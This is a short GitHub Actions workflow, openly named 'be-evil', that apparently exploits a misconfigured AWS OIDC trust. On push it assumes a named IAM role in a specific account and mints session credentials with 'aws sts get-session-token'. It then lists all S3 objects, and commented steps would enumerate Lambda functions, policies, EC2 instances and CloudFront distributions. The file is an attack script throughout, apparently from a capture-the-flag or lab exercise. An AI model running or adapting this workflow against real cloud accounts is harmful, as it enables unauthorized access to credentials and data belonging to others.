name: be-evil
run-name: ${{ github.actor }} is being super evil
on: [push]
permissions:
  id-token: write
jobs:
  infiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Infiltrate Corgi Muahahah
        uses: aws-actions/configure-aws-credentials@main
        with:
          role-to-assume: arn:aws:iam::373958419501:role/cicdRole
          aws-region: us-east-1 
      - name: Additional Steps...
        run: |
          aws sts get-session-token
          aws s3 ls --recursive
#          aws lambda list-functions
#          aws lambda get-function --function-name nslookupv2
#          aws lambda get-policy --function-name nslookupv2
#          aws lambda get-function-configuration --function-name nslookupv2
#          aws ec2 describe-instances
#          aws cloudfront list-distributions
#          aws s3 ls